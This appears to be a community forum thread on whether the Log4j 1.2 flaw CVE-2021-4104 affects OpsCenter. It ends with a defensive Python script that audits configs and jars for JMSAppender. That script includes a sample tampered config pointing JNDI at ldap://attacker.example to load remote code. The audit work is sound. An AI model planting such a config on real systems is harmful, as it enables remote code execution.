yun asked Erick Ramirez answered

Is there any impact of the log4j vulnerability CVE-2021-4104 on OpsCenter ?

Hello All,

Is there any impact of the log4j vulnerability CVE-2021-4104 on OpsCenter?

We are using OpsCenter 6.1.6 and it has /usr/share/opscenter/lib/jvm/log4j-1.2.9.jar


steve.lacerda answered yun commented

The CVE requires the JMSAppender, which neither Opscenterd nor the agents use. Thus, it is not affected by the vulnerability.


Thank you.

Erick Ramirez answered

As it states in CVE-2021-4104, Log4j 1.2 is vulnerable when an attacker gains access to modify the Log4j configuration file (log4j.properties). An attacker is able to execute arbitrary code IF they configure Log4j to use the JMSAppender and make it point to the attacker's own JNDI LDAP endpoint.

To be clear, Log4j is only vulnerable to this specific exploit with these two scenarios:

  1. Log4j is configured to use the JMSAppender.
  2. An attacker gained access to the server to modify configuration files.

OpsCenter is not exposed to scenario #1 because the agent is not configured to use this appender. If scenario #2 is true, then I would suggest that you have bigger problems than just OpsCenter because an attacker has penetrated your environment and circumvented your security measures.

Given that Log4j 1.x has reached its end of life (EOL), it is being replaced in the next release of OpsCenter. Cheers!

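An added example, not code from this thread nor from DataStax or OpsCenter, of the two checks the answers above imply: parse a log4j.properties file and flag any appender configured as org.apache.log4j.net.JMSAppender together with the JNDI settings (ProviderURL, InitialContextFactoryName, TopicBindingName, TopicConnectionFactoryBindingName) that CVE-2021-4104 relies on, and check whether a Log4j 1.2 jar still ships the JMSAppender class. The properties samples, the in-memory stand-in jar and the ldap://attacker.example URL are constructed for the example, and the log file path in the samples is an assumption, not OpsCenter's real configuration.

```python
import io
import re
import zipfile
from typing import Dict, List

JMS_APPENDER_CLASS = "org.apache.log4j.net.JMSAppender"
JMS_APPENDER_ENTRY = "org/apache/log4j/net/JMSAppender.class"
# JMSAppender settings that feed JNDI lookups (Log4j 1.2 JMSAppender options).
JNDI_KEYS = ("ProviderURL", "InitialContextFactoryName",
             "TopicBindingName", "TopicConnectionFactoryBindingName")

# Constructed sample: a file-only Log4j 1.2 config, no JMSAppender anywhere.
BENIGN_PROPS = """# constructed sample, not an OpsCenter file
log4j.rootLogger=INFO, R
log4j.appender.R=org.apache.log4j.RollingFileAppender
log4j.appender.R.File=/var/log/example/app.log
log4j.appender.R.layout=org.apache.log4j.PatternLayout
"""

# Constructed sample: what the config looks like once an attacker with write
# access has added a JMSAppender pointing at their own LDAP server.
TAMPERED_PROPS = """# constructed sample, not an OpsCenter file
log4j.rootLogger=INFO, R, JMS
log4j.appender.R=org.apache.log4j.RollingFileAppender
log4j.appender.R.File=/var/log/example/app.log
log4j.appender.JMS=org.apache.log4j.net.JMSAppender
log4j.appender.JMS.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory
log4j.appender.JMS.ProviderURL=ldap://attacker.example:1389/
log4j.appender.JMS.TopicBindingName=Exploit
log4j.appender.JMS.TopicConnectionFactoryBindingName=TopicConnectionFactory
"""


def parse_log4j_properties(text: str) -> Dict[str, str]:
    """Minimal .properties reader: key=value (or key:value), '#'/'!' comments,
    trailing-backslash line continuation."""
    props: Dict[str, str] = {}
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line[0] in "#!":
            continue
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        key, sep, value = line.partition("=")
        if not sep:
            key, sep, value = line.partition(":")
        props[key.strip()] = value.strip()
    return props


def find_jms_appenders(props: Dict[str, str]) -> List[dict]:
    """Every appender whose class is JMSAppender, with its JNDI-related settings."""
    findings = []
    for key, value in props.items():
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if m and value == JMS_APPENDER_CLASS:
            name = m.group(1)
            settings = {k: props.get(f"log4j.appender.{name}.{k}") for k in JNDI_KEYS}
            findings.append({"appender": name, **{k: v for k, v in settings.items() if v}})
    return findings


def jar_contains_jms_appender(jar_bytes: bytes) -> bool:
    """True if the jar still carries the JMSAppender class file."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return JMS_APPENDER_ENTRY in zf.namelist()


def strip_jms_appender(jar_bytes: bytes) -> bytes:
    """Rebuild the jar without JMSAppender.class (the class removal many vendors
    applied to Log4j 1.x; equivalent to zip -d on the entry)."""
    src = zipfile.ZipFile(io.BytesIO(jar_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JMS_APPENDER_ENTRY:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_sample_jar(include_jms: bool) -> bytes:
    """Constructed stand-in for log4j-1.2.x.jar; only entry names matter here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("org/apache/log4j/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jms:
            zf.writestr(JMS_APPENDER_ENTRY, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def audit(props_text: str, jar_bytes: bytes) -> dict:
    """Scenario #1 check (config uses JMSAppender) plus whether the class is even present."""
    appenders = find_jms_appenders(parse_log4j_properties(props_text))
    return {"jms_appender_configured": bool(appenders),
            "jms_appenders": appenders,
            "jms_class_in_jar": jar_contains_jms_appender(jar_bytes)}


if __name__ == "__main__":
    import json
    for label, text in (("benign", BENIGN_PROPS), ("tampered", TAMPERED_PROPS)):
        print(label, json.dumps(audit(text, build_sample_jar(True)), indent=2))
```

On a real host you would feed `audit` the contents of the actual log4j.properties (or every file that matches, since OpsCenter and the agents have separate configs) and the bytes of the jar the question names; a clean result is "no JMS appender configured", and stripping the class from the jar additionally removes the code path even if scenario #2 (an attacker editing the config) ever occurs.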